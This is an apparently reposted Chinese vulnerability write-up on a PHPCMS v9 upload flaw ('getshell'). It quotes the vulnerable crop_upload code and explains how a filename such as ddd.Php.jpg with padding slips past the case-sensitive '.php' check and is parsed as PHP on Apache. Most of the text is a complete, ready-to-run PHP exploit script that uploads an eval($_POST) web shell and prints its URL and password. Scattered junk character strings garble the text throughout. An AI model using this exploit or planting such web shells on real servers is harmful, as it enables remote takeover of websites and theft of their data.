PHPCMS v9 Getshell

admin

漏洞类型： 文件上传导致任意代码执行
5 K4 C4 @! n3 e4 s  |/ S
* s8 i0 I! m4 G' e简要描述：
5 @; L/ P* c5 W5 {( G2 S
phpcms v9 getshell (apache)
详细说明：

1 {7 Y" a" z" [/ ?漏洞文件：phpcms\modules\attachment\attachments.php
. ^7 I1 y& v% b! X. o: c7 L  `
6 H4 B. G: C1 ~6 E4 b, Opublic function crop_upload() {  (isset($GLOBALS["HTTP_RAW_POST_DATA"])) {  $pic = $GLOBALS["HTTP_RAW_POST_DATA"];  if (isset($_GET['width']) && !empty($_GET['width'])) {  $width = intval($_GET['width']);  }  if (isset($_GET['height']) && !empty($_GET['height'])) {  $height = intval($_GET['height']);  }  if (isset($_GET['file']) && !empty($_GET['file'])) {  $_GET['file'] = str_replace(';','',$_GET['file']);//过滤了分号  if(is_image($_GET['file'])== false || strpos($_GET['file'],'.php')!==false) exit();//is_image()检测是个关键  if (strpos($_GET['file'], pc_base::load_config('system', 'upload_url'))!==false) {  $file = $_GET['file'];  $basenamebasename = basename($file);//获取带有后缀的文件名  if (strpos($basename, 'thumb_')!==false) {  $file_arr = explode('_', $basename);  $basename = array_pop($file_arr);  }  $new_file = 'thumb_'.$width.'_'.$height.'_'.$basename;  } else {  pc_base::load_sys_class('attachment','',0);  $module = trim($_GET['module']);  $catid = intval($_GET['catid']);  $siteid = $this->get_siteid();  $attachment = new attachment($module, $catid, $siteid);  $uploadedfile['filename'] = basename($_GET['file']);  $uploadedfile['fileext'] = fileext($_GET['file']);  if (in_array($uploadedfile['fileext'], array('jpg', 'gif', 'jpeg', 'png', 'bmp'))) {  $uploadedfile['isimage'] = 1;  }  $file_path = $this->upload_path.date('Y/md/');  pc_base::load_sys_func('dir');  dir_create($file_path);  $new_file = date('Ymdhis').rand(100, 999).'.'.$uploadedfile['fileext'];  $uploadedfile['filepath'] = date('Y/md/').$new_file;  $aid = $attachment->add($uploadedfile);  }  $filepath = date('Y/md/');  file_put_contents($this->upload_path.$filepath.$new_file, $pic);//文件名可控、$pic可控  } else {  return false;  }  echo pc_base::load_config('system', 'upload_url').$filepath.$new_file;  exit;  }  }
+ ?0 F! @5 B# Z$ f( n, ]后缀检测：phpcms\modules\attachment\functions\global.func.php
& f( h* E+ R' @3 T; X

; k( F7 [: M% D; L& G7 N+ A( `
. N2 Y# m, i4 G" mfunction is_image($file) { 　　 $ext_arr = array('jpg','gif','png','bmp','jpeg','tiff'); 　　 $ext = fileext($file);关键地方 　　 return in_array($ext,$ext_arr) ? $ext_arr :false; 　　}  
2 G4 Y. s1 S. d0 C; b
关键函数:

" q9 b$ @5 F( f" C: G

% _' I1 C0 k* Mfunction fileext($filename) {  return strtolower(trim(substr(strrchr($filename, '.'), 1, 10))); }  
( f; k/ }7 M, A4 y' ]  J
　　Fileext函数是对文件后缀名的提取。
; R, l8 e1 V! q( B+ R2 Y根据此函数我们如果上传文件名为ddd.Php.jpg%20%20%20%20%20%20%20Php
: U, A0 \  v$ i! K. c5 a9 r: \经过此函数提取到的后缀还是jpg，因此正在is_image()函数中后缀检测被绕过了。
. S  v) `- f: R2 G我们回到public function crop_upload() 函数中
: X7 T* H# @5 V3 ?0 W% M3 }if(is_image($_GET['file'])== false || strpos($_GET['file'],'.php')!==false) exit();
: L' ~( A; v! ]3 @( R8 |* x; r在经过了is_image的判断之后又来了个.php的判断，在此程序员使用的是strpos函数
7 w# e' h1 m* ~, G这个函数是对大小写敏感的函数我们使用.Php就可以直接绕过了。
经过上边的两层的过滤我们的ddd.Php.jpg%20%20%20%20%20%20%20Php后缀依然有效。
4 |) i+ Q% Q! w最后$basename变量的值就为ddd.Php.jpg%20%20%20%20%20%20%20Php 然后使用file_put_contents函数写入到了指定目录。
看见ddd.Php.jpg%20%20%20%20%20%20%20Php这个后缀，大家应该明白了，它用在apache搭建的服务器上可以被解析。
0 I- W; z7 Q; F% @8 i+ e/ s: _% ~漏洞证明：

exp:

9 H* I# \8 i& ]9 ]& t" B# g' X<?php
error_reporting(E_ERROR);
* G% E0 k9 ?+ Q/ }/ Qset_time_limit(0);
6 h6 a- Q  }/ m, E( _9 S$pass="ln";
- g$ E" q$ Z' h3 x7 F: D6 q7 zprint_r('
+---------------------------------------------------------------------------+
PHPCms V9 GETSHELL 0DAY
code by L.N.
5 [0 a7 F6 [1 _3 D! G+ Y7 d
% Y& \) K7 N. ]) u1 Qapache 适用(利用的apache的解析漏洞) // 云安全 www.yunsec.net
+---------------------------------------------------------------------------+
');
if ($argc < 2) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url path
1 l- w% s% r. G# r: @, P/ q
Example:
0 C8 Y( G$ [. h8 O1.php '.$argv[0].' lanu.sinaapp.com
2.php '.$argv[0].' lanu.sinaapp.com /phpcms
6 E/ O% U* Q7 @: k% S6 _( @7 |+---------------------------------------------------------------------------+
');
exit;
}
& z7 R2 T, ~4 A6 w4 B) U& \
& v1 V0 W( I7 l% I  K$url = $argv[1];
/ t9 \( G4 l8 A0 Q7 Q- Q! n+ w- P$path = $argv[2];
$phpshell = '<?php @eval($_POST[\''.$pass.'\']);?>';
. Y) u  M. J/ G0 {% ?$file = '1.thumb_.Php.JPG%20%20%20%20%20%20%20Php';
if($ret=Create_dir($url,$path))
{
//echo $ret;
$pattern = "|Server:[^,]+?|U";
; j' o/ ~+ ?7 R: ^preg_match_all($pattern, $ret, $matches);
0 E$ s* \: ~. X" G% T$ W; N+ Hif($matches[0][0])
" d3 S3 L0 n' f7 S& M8 N{
% S" N6 d7 z; ]4 y* lif(strpos($matches[0][0],'Apache') == false)
{
9 r* J8 z$ ]: }2 _/ h; Qecho "\n亲！此网站不是apache的网站。\n";exit;
}
* i7 w! f8 ?+ F8 E8 o( w}
$ret = GetShell($url,$phpshell,$path,$file);
- G# u. k: e/ }: V$ p" w$pattern = "|http:\/\/[^,]+?\.,?|U";
preg_match_all($pattern, $ret, $matches);
5 ]8 M& j* E" P9 S6 m0 sif($matches[0][0])
{
" m) D) x0 h* D' j, k1 L- N. P: U: fecho "\n".'密码为: '.$pass."\n";
0 n; f) K( P1 ~, D4 m1 Lecho "\r\nurl地址: ".$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;
}
5 q* p. d. M, X* k% E/ O/ {* Felse
{
$pattern = "|\/uploadfile\/[^,]+?\.,?|U";
2 T4 S" q: S3 a7 ?7 R- d+ upreg_match_all($pattern, $ret, $matches);
if($matches[0][0])
{
echo "\n".'密码为: '.$pass."\n";
' n6 t* ]" t; secho "\r\nurl地址:".'http://'.$url.$path.$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;
/ C9 e/ Q! I/ `1 }! O$ w! W9 r6 D7 m}
else
  o6 \$ {* K0 N: w: |, Z" }{
echo "\r\n没得到！\n";exit;
* U+ N8 Z* Q' q}
}
  ^% A- c9 B- u& Q4 p+ \, F}

function GetShell($url,$shell,$path,$js)
$ i( ?% f! }4 p- @& a6 C{
6 \% w  r. i- {9 t% B* o$content =$shell;
1 Y7 a5 E( f0 E3 ^: A$data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://".$url.$path."/uploadfile/".$js." HTTP/1.1\r\n";
- a- x( H, V  h4 j$data .= "Host: ".$url."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
( G- m5 j0 W/ T- R6 h1 ^$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
4 j3 H8 H5 ~. V, X. s& X6 H$data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
$data .= "Connection: close\r\n";
1 q0 B: a" H: S# I! p- f! D$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($url,80);
if (!$ock)
{
6 O" n, I' w3 X: }) decho "\n"."此网站没有回应,检测url是否输入正确"."\n";exit;
! F1 U5 G7 N5 ]4 ^}
8 l  N% V: ~5 k7 D8 ]' o2 z* n) ]else
1 I/ i0 X) ^5 \. K% r0 P+ e{
3 g5 t8 N+ O& j9 ffwrite($ock,$data);
$resp = '';
while (!feof($ock))
{
$resp.=fread($ock, 1024);
}
return $resp;
" c; F1 Q8 C  Y, E}
}

3 j% m: W( Z+ a" X4 H/ T2 ]  q* Efunction Create_dir($url,$path='')
# ^. C# c. E- N- _6 j3 ?$ G{
2 s' Y( T6 {7 O0 x" l$content ='I love you';
. n: S. V( u  g$data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://lanu.sinaapp.com/1.jpg HTTP/1.1\r\n";
- }4 q) O1 O, |# s% p$data .= "Host: ".$url."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
) W$ O1 d) m1 {, O5 f8 o$data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
% i9 l3 v- m- i$data .= "Connection: close\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
; S" ~( H$ Q) y! u1 V$data .= $content."\r\n";
7 S* P4 d/ N( c9 T9 @& F8 X$ock=fsockopen($url,80);
( I8 t8 A; O7 p, y9 jif (!$ock)
* \- y! V1 b& P) ^5 p% D{
& \- q! X* l2 \1 }echo "\n"."此网站没有回应,检测url是否输入正确"."\n";exit;
}
fwrite($ock,$data);
$resp = '';
* K9 _7 h: z: [% Uwhile (!feof($ock))
7 Z, I+ {  N4 C0 P! N) s) t' A& ~3 }{
$resp.=fread($ock, 1024);
}
return $resp;
}
?>

2 x) E. O' E* D. ~1 d! \  o+ t修复方案：
5 y" P% D* R' K
过滤过滤再过滤